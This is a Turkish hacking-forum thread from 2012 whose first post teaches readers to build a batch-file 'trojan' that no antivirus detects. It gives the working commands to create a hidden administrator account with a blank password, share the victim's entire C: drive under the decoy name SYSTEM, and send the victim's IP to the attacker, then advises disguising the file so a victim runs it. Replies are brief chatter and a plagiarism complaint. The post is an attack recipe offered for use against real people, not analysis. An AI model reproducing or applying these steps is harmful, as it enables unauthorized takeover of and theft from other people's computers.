İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Kendi torjenini kendin yap hic bir antivirüse takılmasın

18-04-2012 19:17
#1
Üyelik tarihi:
09/2011
Mesajlar:
423
Teşekkür (Etti):
0
Teşekkür (Aldı):
102
Konular:
69
Ticaret:
(0) %
Piyasada bu konuda son derece fonksiyonel bircok Trojan var fakat bu trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda da sonuna kadar haklidirlar, Trojanlarin Special Edition olan versiyonlarinin disindaki tüm Public versiyonlari maalesef AV lerce taninmakta vs vs gibi olumsuzluklar çıkarmaktadır.

Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi ile neler yapılabileceğinin en kolay yoludur…

*) Not defterini açın ve şu komutları yazın;

net user NICK/add (burada nick senin belirlediğin kullanıcı adı oluyor)

Bu komut sayesinde kurbanin makinasinda "NICK" isminde bir user yarattik. Fakat bu user hesabi sınırlı yetkiye sahip bunu admin yapalım

*) Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;

net localgroup administrators NICK /add

Böylece "NICK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik "NICK" adlı kullanıcı tüm yetkileri aldı

Simdi de kurbanimizin makinasindaki C:\ sürücüsünü sınırsız paylasima acacagiz. Kurbani da huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin asagidaki komutu yazın

net share system=C:\ /unlimited

Karşı tarafın pc sini sonuna kadar actik. Peki kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "NICK" hesabindan baglanacagiz?

a)msn konuşurken netstat –n ile
b)bir tür profesyonel netstat programı ile

Yada  çalışan ama bazen çalışmıyor kodumuza bir satirlik bir komut daha ekleyecegiz;

*) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

net send xx.xxxx.(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

Unutmayin xxx li yere kendi IP nizi yazin.

Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

net start Messenger

aslında bu son komutu kodunuzun en basina koymaniz. Böylelikle ardisik sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha mantıklı

Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve istediğiniz şekilde ister yalnızca bunu(kabul edecekse) yada bir şeyle birleştirerek kurbana yedirin

Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip NICK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C:\ sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.

Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk NICK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C:\ sürücüsüne girer istediginizi yaparsiniz.

Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "NICK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir. Bitti bu kadar basit arkadaslar dediklerimi aynen uygulayin sonunc istediginiz gibi olacaktir

18-04-2012 20:49
#2
12said12 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Mesajlar:
2
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
anlayamadım
18-04-2012 21:47
#3
Üyelik tarihi:
09/2011
Mesajlar:
423
Teşekkür (Etti):
0
Teşekkür (Aldı):
102
Konular:
69
Ticaret:
(0) %
Alıntı:
12said12´isimli üyeden Alıntı Mesajı göster
anlayamadım
kardşm yenisin normal boşkoy o zaman sen hazır kullan
19-04-2012 12:23
#4
katemlireis - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2011
Nereden:
AYYILDIZ.TR
Mesajlar:
852
Teşekkür (Etti):
23
Teşekkür (Aldı):
118
Konular:
121
Ticaret:
(0) %
Bu konu 3 gün önce verildi çalıntı yapma http://www.turkhackteam.net/trojan-v...en-yapimi.html
19-04-2012 21:18
#5
Üyelik tarihi:
02/2012
Mesajlar:
14
Teşekkür (Etti):
16
Teşekkür (Aldı):
0
Konular:
2
Ticaret:
(0) %
Alıntı:
katemlireis´isimli üyeden Alıntı Mesajı göster
Bu konu 3 gün önce verildi çalıntı yapma http://www.turkhackteam.net/trojan-v...en-yapimi.html
AMA BU DAHA AÇIKLAYICI VE GÜZEL
20-04-2012 11:38
#6
katemlireis - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
11/2011
Nereden:
AYYILDIZ.TR
Mesajlar:
852
Teşekkür (Etti):
23
Teşekkür (Aldı):
118
Konular:
121
Ticaret:
(0) %
Alıntı:
dowland delisi´isimli üyeden Alıntı Mesajı göster
AMA BU DAHA AÇIKLAYICI VE GÜZEL
aynı şeyi kopyala yapıştır yapmış bi kelimeyi değişmiş sade bu acıklıyıcılık bakımından ne kadar artı kattı bilemiyorum

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı